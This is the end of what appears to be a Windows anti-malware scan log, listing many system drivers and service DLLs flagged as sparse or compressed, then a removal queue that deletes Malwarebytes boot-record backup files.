File "C:\WINDOWS\System32\drivers\hidbth.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hidi2c.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\HIDINTERRUPT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\HIDINTERRUPT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hidir.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hidusb.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\http.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hwpolicy.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\hyperkbd.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\Ndu.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\HYPERVIDEO.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\HYPERVIDEO.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndproxy.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\i8042prt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\SysWOW64\perfhost.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\IEETWCOLLECTOR.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\intelide.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\intelpep.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\intelppm.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\IPMIDrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ipnat.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\msiscsi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\kbdclass.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\kbdhid.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ksecdd.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ksecpkg.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ksecpkg.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ksthunk.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vpci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\lltdio.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mqac.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mmcss.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mskssrv.sys" is sparse (flags = 32768)
File "C:\Program Files\Windows Defender\MsMpEng.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\wimmount.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\wimmount.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mrxdav.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\modem.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mspqm.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mouclass.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mouhid.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mountmgr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mrxsmb10.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mrxsmb20.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\Ucx01000.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ufx01000.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\bridge.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\VSSVC.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msdtc.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\MSHIDKMDF.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\MSHIDUMDF.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\msisadrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mstee.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msiexec.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mslldp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\mssmbios.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\MTConfig.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\nwifi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\nwifi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\netbios.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndis.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndiscap.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NDISIMPLATFORM.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tunnel.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndistapi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbhub.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NDISVIRTUALBUS.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ndiswan.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\netbt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\nsiproxy.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\NV_AGP.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbehci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbehci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbohci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbohci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbuhci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbuhci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\USBXHCI.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\parport.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\vds.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\partmgr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pcw.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pdc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pcmcia.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\PEAuth.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\qwavedrv.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\raspptp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\processr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\pacer.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rasacd.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\agilevpn.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\raspppoe.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rassstp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rdbss.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rdpbus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rdpdr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\rdyboost.sys" is sparse (flags = 32768)
File "C:\WINDOWS\servicing\TRUSTEDINSTALLER.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vms3cap.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\sbp2port.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\WdFilter.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\scfilter.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SENSORDATASERVICE.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\serenum.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SerCx2.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\sermouse.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\URSCX01000.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\sfloppy.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\snmptrap.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sppsvc.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\srvnet.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\volmgrx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\storahci.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\stornvme.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\storufs.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\storvsc.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tcpipreg.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tdx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\tpm.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\terminpt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vdrvroot.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\TsUsbFlt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\TsUsbGD.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\UAGP35.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\uaspstor.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\UcmCx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\Udecx.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbccgp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\UI0DETECT.EXE" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ULIAGPKX.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\umbus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\USBAUDIO.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbcir.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\USBHUB3.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbprint.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\usbser.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\USBSTOR.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\VERIFIEREXT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vhdmp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vhf.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vmbus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\VMBusHID.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\volsnap.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vsmraid.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vwifibus.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\vwififlt.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\wacompen.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\WUDFRd.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\wanarp.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\winusb.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbengine.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\WdBoot.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\Wdf01000.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\WdiWiFi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\WdNisDrv.sys" is sparse (flags = 32768)
File "C:\Program Files\Windows Defender\NisSrv.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\wfplwfs.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\WINDOWSTRUSTEDRT.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\wmiacpi.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\WmiApSrv.exe" is sparse (flags = 32768)
File "C:\Program Files\Windows Media Player\wmpnetwk.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\wpcfltr.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\WPDUPFLTR.SYS" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\ws2ifsl.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\drivers\WUDFPf.sys" is sparse (flags = 32768)
File "C:\WINDOWS\System32\AJRouter.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.STATEREPOSITORY.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.STATEREPOSITORY.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\AUDIOENDPOINTBUILDER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\AUDIOENDPOINTBUILDER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WALLETSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\APPXDEPLOYMENTSERVER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\APPXDEPLOYMENTSERVER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\EMBEDDEDMODESVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\inetsrv\APPHOSTSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ipnathlp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\lsm.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\umpnpmgr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rpcss.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\appinfo.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\appidsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\AxInstSv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dcpsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\APPREADINESS.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\audiosrv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\RpcEpMap.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dssvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\bdesvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\BFE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\XBLAUTHMANAGER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\netman.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DEVICESETUPMANAGER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cdpsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\umpo.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\qmgr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ListSvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\lltdsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\bisrv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dhcpcore.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\browser.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\BthHFSrv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\BthHFSrv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\profsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\pnrpsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\bthserv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\provsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\das.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\LICENSEMANAGERSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\certprop.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DMWAPPUSHSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ClipSVC.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\COREMESSAGING.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\COREMESSAGING.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\cryptsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TETHERINGSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TETHERINGSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\moshost.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\moshost.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DEFRAGSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DEVQUERYBROKER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wscsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WsmSvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wersvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wecsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wcmsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wkssvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dot3svc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DIAGTRACK.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\DIAGTRACK.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.INTERNAL.MANAGEMENT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WINDOWS.INTERNAL.MANAGEMENT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\MPSSVC.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\fdPHost.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dnsrslvr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\dps.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WERCPLSUPPORT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\eapsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\efssvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ENTERPRISEAPPMGMTSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ENTERPRISEAPPMGMTSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\FntCache.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\es.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sdrsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\srvsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\FDResPub.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\upnphost.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\fhsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\gpsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\hidserv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\IKEEXT.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\iphlpsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\keyiso.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\msdtckrm.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\lfsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\lmhsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\iscsiexe.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\nsisvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\nlasvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ngcsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NcaSvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NCDAUTOSETUP.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NCBSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\netlogon.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\trkwks.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NETPROFMSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NETSETUPSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NETSETUPSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\icsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\NGCCTNRSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\APHOSTSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\pcasvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\p2psvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\PIMINDEXMAINTENANCE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\PIMINDEXMAINTENANCE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\pla.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\pnrpauto.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\IPSECSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\qwave.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rasauto.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rasmans.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\mprdim.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\regsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\RDXSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\RDXSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\schedsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SCardSvr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\XBLGAMESAVE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SCDEVICEENUM.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\seclogon.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Sens.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SENSORSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sensrsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SessEnv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\shsvcs.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TILEOBJSERVER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TILEOBJSERVER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\smphost.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SMSROUTERSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\StorSvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sstpsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ssdpsrv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wiaservc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\svsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\swprv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\inetsrv\iisw3adm.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\sysmain.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SYSTEMEVENTSBROKERSERVER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\SYSTEMEVENTSBROKERSERVER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TabSvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\termsrv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\tapisrv.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\THEMESERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\TIMEBROKERSERVER.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\umrdp.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\Unistore.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\USERDATASERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\USERDATASERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\usermgr.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\usocore.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\vaultsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\w32time.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\inetsrv\w3logsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbiosrvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wwansvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WUDFSvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wlidsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wlansvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wcncsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wcncsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WebClnt.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WCSPLUGINSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wdi.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WEPHOSTSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wiarpc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wbem\WMIsvc.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WORKFOLDERSSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WORKFOLDERSSVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WPDBUSENUM.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WPNSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\WSSERVICE.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\wuaueng.dll" is sparse (flags = 32768)
File "C:\WINDOWS\System32\XBOXNETAPISVC.DLL" is sparse (flags = 32768)
File "C:\WINDOWS\System32\rundll32.exe" is sparse (flags = 32768)
File "C:\Program Files\Windows Mail\WinMail.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\unregmp2.exe" is sparse (flags = 32768)
File "C:\WINDOWS\System32\ie4uinit.exe" is sparse (flags = 32768)
File "C:\WINDOWS\SysWOW64\rundll32.exe" is sparse (flags = 32768)
File "C:\ProgramData\AVAST Software\Avast\log\AvastSvc.log" is compressed (flags = 1)
File "C:\ProgramData\AVAST Software\Avast\log\AvastUI.log" is compressed (flags = 1)
File "C:\ProgramData\AVAST Software\Avast\log\CommChannel.Protocol.log" is compressed (flags = 1)
File "C:\Users\Kym\AppData\Local\Comms\UnistoreDB\store.vol" is sparse (flags = 32768)
File "C:\WINDOWS\System32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat" is sparse (flags = 32768)
Scan finished
=======================================
Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-206848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-1-0-206848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-2-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-r.mbam...
Removal finished
